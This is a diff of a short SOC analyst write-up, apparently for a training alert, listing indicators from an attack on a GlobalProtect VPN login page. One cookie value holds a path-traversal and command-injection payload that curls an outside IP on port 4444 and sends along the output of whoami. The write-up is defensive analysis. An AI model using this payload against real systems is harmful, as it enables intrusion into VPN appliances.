chrisfdeangelis/SOC-monitoring/SOC274/writeup.md

 #### IP Addresses

--144.172.79.92
+- 144.172.79.92

 #### Domains

--cloudzy.com
+- cloudzy.com

 #### URLs

--172.16.17.139/global-protect/login.esp
+- 172.16.17.139/global-protect/login.esp

--this is a standard VPN login action.
+- this is a standard VPN login action.
 Not necessary malicious

 #### Cookie

--SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)
+- SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

--this is the most suspect item.
+- this is the most suspect item.
 This cookie attempts to traverse directories and run commands via the shell.
 Inspection of the endpoint reveals no such processes ran.

 ---